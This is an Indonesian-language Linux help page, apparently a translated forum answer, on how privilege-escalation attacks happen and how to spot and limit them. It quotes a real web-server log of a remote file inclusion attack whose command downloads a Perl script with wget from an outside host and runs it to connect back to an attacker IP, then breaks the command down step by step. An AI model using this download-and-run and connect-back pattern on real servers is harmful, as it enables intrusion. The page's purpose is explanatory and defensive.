GNU/Linux >> Belajar Linux >  >> Linux

Deteksi eskalasi hak istimewa?

Eksploitasi pada dasarnya berusaha untuk tidak terdeteksi. Jadi sebagian besar eksploit tidak masuk ke sistem melalui cara normal, setidaknya tidak pada awalnya. Mereka biasanya akan menggunakan sesuatu seperti buffer overflow untuk mendapatkan akses ke sistem.

pelimpahan buffer

Gaya serangan ini mencari bagian dari aplikasi yang ingin menerima masukan dari pengguna. Pikirkan tentang halaman web dan berbagai kotak teks tempat Anda harus memberikan informasi dengan mengetik sesuatu ke dalam kotak teks ini. Masing-masing kotak teks ini merupakan titik masuk potensial bagi calon penyerang.

Kabar baiknya:

  • sebagian besar serangan ini tidak mendapatkan akses root, mereka mendapatkan akses ke akun pengguna yang disiapkan khusus untuk server web, sehingga biasanya memiliki akses terbatas hanya ke file dan fungsi server web.
  • dalam menerobos penyerang telah meninggalkan jejak yang cukup besar di sejumlah area.
    • Log firewall
    • Log server web
    • Log alat keamanan potensial lainnya

Kabar buruknya:

  • Mereka telah memperoleh akses ke sistem, sehingga memiliki tempat berpijak tempat mereka dapat terus mencoba masuk lebih jauh.
  • Log. Ya, sebagian besar pembobolan waktu tidak terdeteksi selama berminggu-minggu/bulan/tahun karena menganalisis log memakan waktu dan rawan kesalahan.

mendeteksi login root

Sebagian besar sistem dirancang untuk tidak mengizinkan login root sehingga vektor serangan ini tidak benar-benar menjadi masalah. Sebagian besar serangan mendapatkan akses ke beberapa akun lain dengan level yang lebih rendah, lalu meningkatkannya dengan menemukan kerentanan tambahan setelah mereka membangun tempat berpijak di sistem Anda.

contoh #1:

Calon penyerang dapat memperoleh akses root dengan melakukan hal berikut:

  1. Membobol akun server web sistem dengan menemukan halaman web rentan yang memproses input pengguna dari beberapa formulir melalui kotak teks.
  2. Setelah akses ke akun server web tercapai, coba dapatkan akses shell melalui akun server web atau coba buat akun server web untuk menjalankan perintah atas nama Anda.
  3. Menentukan bahwa ada kelemahan dalam versi alat sistem tertentu ini seperti perintah ls .
  4. Melimpahi alat ls untuk mendapatkan akses ke akun root.

contoh #2:

Seorang calon penyerang bahkan mungkin tidak tertarik untuk mendapatkan kendali penuh atas sistem Anda. Kebanyakan pembobolan hanya tertarik untuk mengumpulkan sistem untuk digunakan sebagai "budak" untuk kegunaan lain. Sering kali penyerang hanya tertarik untuk memasang perangkat lunak mereka di sistem Anda sehingga mereka dapat menggunakan sistem, bahkan tanpa mendapatkan kontrol penuh atas sistem.

  1. Tentukan bahwa situs web tertentu telah menyediakan webapp X. Penyerang mengetahui bahwa webapp X memiliki kerentanan di mana webapp X memungkinkan pengguna mengunggah file gambar.
  2. Penyerang menyiapkan file bernama CMD.gif dan mengunggahnya. Mungkin gambar avatar pengguna di situs forum, misalnya. Tapi CMD.gif bukan gambar, itu sebenarnya program, yang bernama CMD.gif .
  3. Penyerang mengunggah "gambar" ke situs forum.
  4. Sekarang penyerang "mengelabui" webapp X untuk menjalankan "citranya".
  5. Penyerang melakukan panggilan dengan browsernya ke webapp X, tetapi dia menyebutnya dengan cara yang tidak pernah dibayangkan oleh pembuat webapp X. Mereka juga tidak mendesain webapp X untuk melarangnya.

file log server web dari serangan semacam itu 

201-67-28-XXX.bsace703.dsl.brasiltelecom.net.br - - [16/Sep/2006:15:18:53 -0300]
  "GET /cursosuperior/index.php?page=http://parit.org/CMD.gif?
  &cmd=cd%20/tmp;wget%20http://72.36.254.26/~fanta/dc.txt;perl%20dc.txt
  %2072.36.21.183%2021 HTTP/1.1" 200

CATATAN: contoh log dari server web Apache milik OSSEC.net.

Di sini penyerang mendapatkan webapp X (index.php) untuk menjalankan CMD.gif yang kemudian dapat melakukan hal berikut:

  1. cd /tmp
  2. wget http://72.36.254.26/~fanta/dc.txt
  3. perl dc.txt 72.36.21.183 21

Jadi mereka membujuk webapp X untuk mengubah direktori menjadi /tmp , unduh file, dc.txt , lalu jalankan file membuat koneksi kembali ke alamat IP 72.36.21.183 pada port 21.

Menonaktifkan server yang "disusupi"

Gagasan bahwa Anda dapat mematikan server yang telah "mendeteksi" eksploit adalah upaya yang bagus, tetapi tidak berhasil karena beberapa alasan.

  1. Jika penyerang bisa masuk ke sistem pertama, mereka mungkin bisa masuk ke sistem kedua.
  2. Sebagian besar sistem pada dasarnya adalah tiruan satu sama lain. Mereka lebih mudah dipelihara, dan menjaga agar tetap sederhana (sama) adalah ciri khas dari kebanyakan hal di TI dan komputer.
  3. Konfigurasi yang berbeda berarti lebih banyak pekerjaan dalam memelihara sistem dan lebih banyak peluang untuk membuat kesalahan, yang biasanya menyebabkan kerentanan.
  4. Tujuan penyerang mungkin bukan untuk masuk, mereka mungkin mencoba menolak akses ke layanan Anda. Ini disebut denial of service (DoS).

Mencoba membatasi kerusakan

Saya bisa terus dan terus tetapi secara umum Anda memiliki beberapa sumber daya yang tersedia untuk mengamankan sistem.

  • Gunakan alat seperti tripwire untuk mendeteksi perubahan pada sistem file sistem.
  • Firewall - batasi akses sehingga hanya diizinkan secara eksplisit jika diperlukan, daripada memiliki akses penuh ke semuanya.
  • Analisis file log menggunakan alat untuk mendeteksi anomali.
  • Selalu perbarui sistem dengan tambalan.
  • Batasi pemaparan - hanya instal perangkat lunak yang diperlukan pada sistem - jika tidak memerlukan gcc compiler terpasang, jangan pasang.
  • IDS - perangkat lunak pendeteksi intrusi.

Linux

  1. Hosting Web Murah

  2. Pengalihan situs web sederhana melalui .htaccess

  3. Apakah sudo dan .profile/.bashrc mengaktifkan eskalasi hak istimewa yang sepele?

  1. Cara mengkonfigurasi server web Apache

  2. Menyetel Apache Web Server Keepalive

  3. Bagaimana cara mendeteksi dan mengurangi eskalasi kerentanan hak istimewa Intel pada sistem Linux (CVE-2017-5689)?

  1. Apa itu Web3.0?

  2. Dasar-dasar Vhost

  3. Server Web Linux Terbaik